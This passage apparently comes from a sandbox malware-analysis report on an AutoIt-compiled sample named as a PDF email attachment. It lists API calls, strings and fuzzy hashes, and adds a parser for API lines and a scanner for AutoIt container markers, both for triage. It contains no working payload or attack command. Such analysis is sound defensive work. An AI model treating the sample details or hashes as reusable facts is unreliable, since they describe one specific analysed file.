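                   subcall_of=int(m["sub"], 16) if m["sub"] else None)
    call.note = _decode(call)
    return call


def annotate(lines) -> List[ApiCall]:
    """Parse every API line; headers, hashes and other report lines are skipped."""
    return [c for c in (parse_line(ln) for ln in lines) if c is not None]


# Sample input: five API lines copied from the function cards above plus one header line.
SAMPLE = [
    "• LoadCursorW.USER32(00000000,00007F8A), ref: 007C5013",
    "• SendMessageW.USER32(?,000000C2,00000001,?), ref: 007DC705",
    "• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 007DC851",
    "  • Part of subcall function 007DAB37: GetWindowRect.USER32(?,?), ref: 007DABD6",
    "• GetDesktopWindow.USER32 ref: 007DA40D",
    "Strings",
]

if __name__ == "__main__":
    for c in annotate(SAMPLE):
        print(f"{c.ref:08X} {c.func}.{c.module} {c.args} {c.note}")
```

Feed it the "APIs" block of any card (for example by pasting the lines into SAMPLE or reading them from a file) and it prints one decoded record per call site; calls it does not know how to decode keep an empty note rather than a guessed name.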
APIs
• CharUpperBuffW.USER32(?,?), ref: 007D4424
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007D446F
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 3974292440-4258414348
• Opcode ID: 80a6dfdc91e3c315630d2c4d2523963c33cebe1daea44ade10e478d55d355e03
• Instruction ID: 2747a6bfe125b8bb81f22283e2504478b03f647368605189121755c2115c4572
• Opcode Fuzzy Hash: 80a6dfdc91e3c315630d2c4d2523963c33cebe1daea44ade10e478d55d355e03
• Instruction Fuzzy Hash: 33918C71204701DFCB04EF20C856AAEB7E1AF95750F058869FD965B3A2CB78ED49CB81
APIs
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007DB8B4
• LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,007D91C2), ref: 007DB910
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007DB949
• LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007DB98C
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007DB9C3
• FreeLibrary.KERNEL32(?), ref: 007DB9CF
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007DB9DF
• DestroyIcon.USER32(?,?,?,?,?,007D91C2), ref: 007DB9EE
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 007DBA0B
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 007DBA17
  • Part of subcall function 00772EFD: __wcsicmp_l.LIBCMT ref: 00772F86
Memory Dump Source
• Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                          • String ID: .dll$.exe$.icl
                                                                                                          • API String ID: 1212759294-1154884017
                                                                                                          APIs
                                                                                                          • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 007B9C7F
                                                                                                            • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
                                                                                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007B9CA0
                                                                                                          • __swprintf.LIBCMT ref: 007B9CF9
                                                                                                          • __swprintf.LIBCMT ref: 007B9D12
                                                                                                          • _wprintf.LIBCMT ref: 007B9DB9
                                                                                                          • _wprintf.LIBCMT ref: 007B9DD7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                          • API String ID: 311963372-3080491070
                                                                                                          APIs
                                                                                                            • Part of subcall function 00759837: __itow.LIBCMT ref: 00759862
                                                                                                            • Part of subcall function 00759837: __swprintf.LIBCMT ref: 007598AC
                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 007BA3CB
                                                                                                          • GetDriveTypeW.KERNEL32 ref: 007BA418
                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007BA460
                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007BA497
                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007BA4C5
                                                                                                            • Part of subcall function 00757BCC: _memmove.LIBCMT ref: 00757C06
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                          • API String ID: 2698844021-4113822522
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0078E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 007AF8DF
                                                                                                          • LoadStringW.USER32(00000000,?,0078E029,00000001), ref: 007AF8E8
                                                                                                            • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0078E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 007AF90A
                                                                                                          • LoadStringW.USER32(00000000,?,0078E029,00000001), ref: 007AF90D
                                                                                                          • __swprintf.LIBCMT ref: 007AF95D
                                                                                                          • __swprintf.LIBCMT ref: 007AF96E
                                                                                                          • _wprintf.LIBCMT ref: 007AFA17
                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007AFA2E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                          • API String ID: 984253442-2268648507
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,007D9207,?,?), ref: 007DBA56
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,007D9207,?,?,00000000,?), ref: 007DBA6D
                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,007D9207,?,?,00000000,?), ref: 007DBA78
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,007D9207,?,?,00000000,?), ref: 007DBA85
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 007DBA8E
                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,007D9207,?,?,00000000,?), ref: 007DBA9D
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 007DBAA6
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,007D9207,?,?,00000000,?), ref: 007DBAAD
                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,007D9207,?,?,00000000,?), ref: 007DBABE
                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,007E2CAC,?), ref: 007DBAD7
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 007DBAE7
                                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 007DBB0B
                                                                                                          • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 007DBB36
                                                                                                          • DeleteObject.GDI32(00000000), ref: 007DBB5E
                                                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007DBB74
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                          • String ID:
                                                                                                          • API String ID: 3840717409-0
                                                                                                          APIs
                                                                                                          • __wsplitpath.LIBCMT ref: 007BDA10
                                                                                                          • _wcscat.LIBCMT ref: 007BDA28
                                                                                                          • _wcscat.LIBCMT ref: 007BDA3A
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007BDA4F
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 007BDA63
                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 007BDA7B
                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 007BDA95
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 007BDAA7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                          • String ID: *.*
                                                                                                          • API String ID: 34673085-438819550
                                                                                                          APIs
                                                                                                            • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                                                                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007DC1FC
                                                                                                          • GetFocus.USER32 ref: 007DC20C
                                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 007DC217
                                                                                                          • _memset.LIBCMT ref: 007DC342
                                                                                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 007DC36D
                                                                                                          • GetMenuItemCount.USER32(?), ref: 007DC38D
                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 007DC3A0
                                                                                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 007DC3D4
                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 007DC41C
                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007DC454
                                                                                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 007DC489
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 1296962147-4108050209
                                                                                                          • Opcode ID: a7d491eae467bdad38076405775c1fdf294d3104b0acd0171a80bcee123a041c
                                                                                                          • Instruction ID: a8967790cd24ba47bf1ce4a0d359cde1aeda37febe7410656d1f6674584f5996
                                                                                                          • Opcode Fuzzy Hash: a7d491eae467bdad38076405775c1fdf294d3104b0acd0171a80bcee123a041c
                                                                                                          • Instruction Fuzzy Hash: 1F816B702093429FD712CF14C894AAABBF8FF88714F00892EF99597391D778D905CBA2
                                                                                                          APIs
                                                                                                          • GetDC.USER32(00000000), ref: 007C738F
                                                                                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 007C739B
                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 007C73A7
                                                                                                          • SelectObject.GDI32(00000000,?), ref: 007C73B4
                                                                                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 007C7408
                                                                                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 007C7444
                                                                                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 007C7468
                                                                                                          • SelectObject.GDI32(00000006,?), ref: 007C7470
                                                                                                          • DeleteObject.GDI32(?), ref: 007C7479
                                                                                                          • DeleteDC.GDI32(00000006), ref: 007C7480
                                                                                                          • ReleaseDC.USER32(00000000,?), ref: 007C748B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                          • String ID: (
                                                                                                          • API String ID: 2598888154-3887548279
                                                                                                          • Opcode ID: ac2edbb4180da5ea4c75440be5b534cafc23c7a1cfea093ebed92fb7d3efffe4
                                                                                                          • Instruction ID: 037da7544db92a7a6f22c8287954ed2b307e041597aaf2d629615f5dcafee379
                                                                                                          • Opcode Fuzzy Hash: ac2edbb4180da5ea4c75440be5b534cafc23c7a1cfea093ebed92fb7d3efffe4
                                                                                                          • Instruction Fuzzy Hash: BC513871904249EFCB14CFA8CC89EAEBBB9EF48310F14C42EF95A97210C735A940CB50
                                                                                                          APIs
                                                                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,007CFDAD,?,?), ref: 007D0E31
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharUpper
                                                                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$Pm
                                                                                                          • API String ID: 3964851224-1436186361
                                                                                                          • Opcode ID: f5308728057844d2a663890636d9df807e981cfc0e20ba07b927e3b0ba5507a8
                                                                                                          • Instruction ID: 94fb217c4413084fad1927cc7d040548c4b91bee09711a0eaf12b39baf6d3f0a
                                                                                                          • Opcode Fuzzy Hash: f5308728057844d2a663890636d9df807e981cfc0e20ba07b927e3b0ba5507a8
                                                                                                          • Instruction Fuzzy Hash: 3A41667150024ACBCF10EF50E86AAEE3364FF11340F658416FC995B292DB78A91ACBA0
                                                                                                          APIs
                                                                                                            • Part of subcall function 00770957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00756B0C,?,00008000), ref: 00770973
                                                                                                            • Part of subcall function 00754750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00754743,?,?,007537AE,?), ref: 00754770
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00756BAD
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00756CFA
                                                                                                            • Part of subcall function 0075586D: _wcscpy.LIBCMT ref: 007558A5
                                                                                                            • Part of subcall function 0077363D: _iswctype.LIBCMT ref: 00773645
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                          • API String ID: 537147316-1018226102
                                                                                                          • Opcode ID: b2dd9f1c441d2dfca279bf6f23bd3af2210f855dc6f11de4541a670ec9fa9594
                                                                                                          • Instruction ID: 12671ac4cb814dd2ce79fffc3e1f4a2154f2492dd94ad4574d21c8e5519e97af
                                                                                                          • Opcode Fuzzy Hash: b2dd9f1c441d2dfca279bf6f23bd3af2210f855dc6f11de4541a670ec9fa9594
                                                                                                          • Instruction Fuzzy Hash: D202AB70208340DFCB24EF20C8959AFBBE5EF95314F50491DF89A972A1DB78E949CB52
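The string table of the function above ("AU3!", "EA06", ">>>AUTOIT SCRIPT<<<", the #include and directive error messages) belongs to the interpreter routine that locates and parses the embedded compiled script; it is the evidence behind the report's "Binary is likely a compiled AutoIt script file" signature. The scanner below is an added example written for this page, not code from the Joe Sandbox report or from AutoIt. It searches a file for those markers. It assumes, which the page does not state, that "AU3!" and "EA06" sit next to each other in the script container header and that the resource marker is stored as UTF-16LE text; the sample buffer is constructed for illustration.

```python
"""Triage check: does a file carry the markers AutoIt3 leaves in a compiled script container?"""

# Tokens quoted in the report's string table for the script-loading routine.
SCRIPT_TAG = b"AU3!"          # container tag
SCRIPT_VERSION = b"EA06"      # version tag; assumed (not stated on the page) to follow AU3! directly
RESOURCE_MARKER = ">>>AUTOIT SCRIPT<<<"
MARKER_UTF16 = RESOURCE_MARKER.encode("utf-16-le")   # assumed storage encoding
MARKER_ASCII = RESOURCE_MARKER.encode("ascii")


def find_all(data: bytes, needle: bytes) -> list:
    """Every offset at which `needle` occurs in `data` (overlaps allowed)."""
    hits, start = [], 0
    while True:
        i = data.find(needle, start)
        if i < 0:
            return hits
        hits.append(i)
        start = i + 1


def find_script_tags(data: bytes, window: int = 8) -> list:
    """Offsets of 'AU3!' that are followed by 'EA06' within `window` bytes.

    Requiring the pair, rather than 'AU3!' alone, keeps random 4-byte
    coincidences out of the result.
    """
    out = []
    for i in find_all(data, SCRIPT_TAG):
        if data.find(SCRIPT_VERSION, i + len(SCRIPT_TAG), i + len(SCRIPT_TAG) + window) >= 0:
            out.append(i)
    return out


def find_autoit_markers(data: bytes) -> dict:
    """Offsets of each marker kind; empty lists mean not found."""
    return {
        "script_tag": find_script_tags(data),
        "marker_utf16": find_all(data, MARKER_UTF16),
        "marker_ascii": find_all(data, MARKER_ASCII),
    }


def looks_like_compiled_autoit(data: bytes) -> bool:
    """True when any AutoIt container marker is present."""
    return any(find_autoit_markers(data).values())


# Constructed sample, not a real executable: an MZ stub, the UTF-16 resource
# marker at offset 64, then the AU3!EA06 tag at offset 118.
SAMPLE = (b"MZ" + b"\x00" * 62 + MARKER_UTF16 + b"\x00" * 16
          + SCRIPT_TAG + SCRIPT_VERSION + b"\x00" * 32)

if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(path, "rb").read() if path else SAMPLE
    print(find_autoit_markers(data), looks_like_compiled_autoit(data))
```

The markers come from the interpreter stub, which every AutoIt-compiled executable carries, so a hit only says "this is a compiled AutoIt script", exactly what the report's signature says, and nothing about whether the script is malicious. Use it to route a sample to script extraction and review of the decompiled .au3, not as a verdict.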
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 007B2D50
                                                                                                          • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 007B2DDD
                                                                                                          • GetMenuItemCount.USER32(00815890), ref: 007B2E66
                                                                                                          • DeleteMenu.USER32(00815890,00000005,00000000,000000F5,?,?), ref: 007B2EF6
                                                                                                          • DeleteMenu.USER32(00815890,00000004,00000000), ref: 007B2EFE
                                                                                                          • DeleteMenu.USER32(00815890,00000006,00000000), ref: 007B2F06
                                                                                                          • DeleteMenu.USER32(00815890,00000003,00000000), ref: 007B2F0E
                                                                                                          • GetMenuItemCount.USER32(00815890), ref: 007B2F16
                                                                                                          • SetMenuItemInfoW.USER32(00815890,00000004,00000000,00000030), ref: 007B2F4C
                                                                                                          • GetCursorPos.USER32(?), ref: 007B2F56
                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 007B2F5F
                                                                                                          • TrackPopupMenuEx.USER32(00815890,00000000,?,00000000,00000000,00000000), ref: 007B2F72
                                                                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007B2F7E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 3993528054-0
                                                                                                          • Opcode ID: 08d14f988a71bcc55cdc1cee67b262a847fa413bcb7ff57163768ecce94e1fbd
                                                                                                          • Instruction ID: e502760cce1e5a37ecaa4e84144baf8990b2a83f9eb138334e878a78547aea3c
                                                                                                          • Opcode Fuzzy Hash: 08d14f988a71bcc55cdc1cee67b262a847fa413bcb7ff57163768ecce94e1fbd
                                                                                                          • Instruction Fuzzy Hash: DB710870602205BFEB218F55DC49FEABF64FF04364F14421AF625AA1E2C7799C21D794
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 007C88D7
                                                                                                          • CoInitialize.OLE32(00000000), ref: 007C8904
                                                                                                          • CoUninitialize.OLE32 ref: 007C890E
                                                                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 007C8A0E
                                                                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 007C8B3B
                                                                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,007E2C0C), ref: 007C8B6F
                                                                                                          • CoGetObject.OLE32(?,00000000,007E2C0C,?), ref: 007C8B92
                                                                                                          • SetErrorMode.KERNEL32(00000000), ref: 007C8BA5
